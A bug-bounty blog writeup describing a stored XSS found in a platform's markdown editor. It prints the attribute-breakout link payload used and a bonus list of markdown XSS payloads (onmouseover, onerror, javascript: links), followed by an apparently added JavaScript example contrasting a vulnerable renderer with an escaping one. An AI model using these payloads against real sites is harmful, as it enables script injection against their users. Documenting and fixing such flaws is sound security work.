Yeah! I got P2 in 1 minute - Stored XSS via Markdown Editor

Schopath
Jul 2

Hello! I want to tell you about my “Bug Bounty” writeup, “Stored XSS (Cross-Site Scripting)”, and my lucky story: this is my fastest finding with HIGH severity (P2).

I discovered a P2 (Stored XSS) vulnerability while I was reporting a P4 (Denial of Service).

As the idiom says:

> Kill two birds with one stone.


Okay, here we go!

## Steps to Reproduce:

1. Go to [Here](https://[REDACTED]/[REDACTED])...

While thinking of the words for my report, I remembered something and tried to create an XSS payload in the markdown editor (but I didn’t expect it to be XSS).

At the end of my report, I added (XSS Payload):

Cheers,

[Schopath](https://schopath.ninja/"/onmouseover="alert(/schopath/)"/x="ZeroByte.ID)

Then I submitted my P4 report.


What the …

Boom! Gotcha!

Really? It works! And I still don’t believe it.
So many reports have been entered on that platform, and only I tried this?


Debugger (F12)
View Source (CTRL + U)

Oh no, I’m just a lucky kid.


BONUS! Markdown XSS payloads:

Image:

![" onmouseover="alert('1337');](https://img.uri/random.png)

![DESC](x"/onerror="alert`/Oops/`)

Anchor/URL:

[BOOM](javascript:alert(document.domain))
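Every payload above relies on the renderer copying the link text or URL into an HTML attribute without escaping it, or on it accepting any URL scheme. As an added example (not code from the original post or from the affected platform, whose renderer is not shown), here is a minimal link/image renderer in its naive form beside a hardened one; `renderNaive`, `renderSafe`, `safeUrl` and the scheme allow-list are hypothetical names and assumptions.

```javascript
// Added example: names and the scheme allow-list are assumptions, not the platform's code.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);
// Matches [text](url) and ![alt](url); the URL may hold one level of parentheses.
const LINK_RE = /(!?)\[([^\]]*)\]\(((?:[^()\s]|\([^()\s]*\))*)\)/g;

// Encode every character that can end an attribute value or start a tag.
function escapeHtml(s) {
  return s.replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Return a normalized absolute URL with an allowed scheme, or null.
function safeUrl(raw) {
  let u;
  try { u = new URL(raw.replace(/[\u0000-\u0020\u007f]/g, "")); }
  catch { return null; } // relative or malformed URLs are rejected here
  return SAFE_SCHEMES.has(u.protocol) ? u.href : null;
}

// Naive: text and URL are interpolated raw, so a quote closes the attribute.
function renderNaive(md) {
  return md.replace(LINK_RE, (_, bang, text, url) =>
    bang ? `<img alt="${text}" src="${url}">` : `<a href="${url}">${text}</a>`);
}

// Hardened: allow-listed scheme, and every value escaped before it is emitted.
function renderToken([whole, bang, text, url]) {
  const href = safeUrl(url);
  if (href === null) return escapeHtml(whole); // keep the source as inert text
  return bang
    ? `<img alt="${escapeHtml(text)}" src="${escapeHtml(href)}">`
    : `<a href="${escapeHtml(href)}" rel="nofollow noopener">${escapeHtml(text)}</a>`;
}

function renderSafe(md) {
  let out = "", last = 0;
  for (const m of md.matchAll(LINK_RE)) {
    out += escapeHtml(md.slice(last, m.index)) + renderToken(m);
    last = m.index + m[0].length;
  }
  return out + escapeHtml(md.slice(last));
}

// Constructed inputs: the page's payloads, typed with straight quotes.
const SAMPLES = [
  'Cheers, [Schopath](https://schopath.ninja/"/onmouseover="alert(/schopath/)"/x="ZeroByte.ID)',
  `![" onmouseover="alert('1337');](https://img.uri/random.png)`,
  "[BOOM](javascript:alert(document.domain))",
];
for (const s of SAMPLES) console.log(renderNaive(s), "\n ->", renderSafe(s));
```

In the hardened output the only raw double quotes left are the ones delimiting attributes, and the `javascript:` link stays as plain text.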


Thank you for reading.

Schopath

Beginner Cyber-Security Researcher at ZeroByte.ID. Indonesian Writer.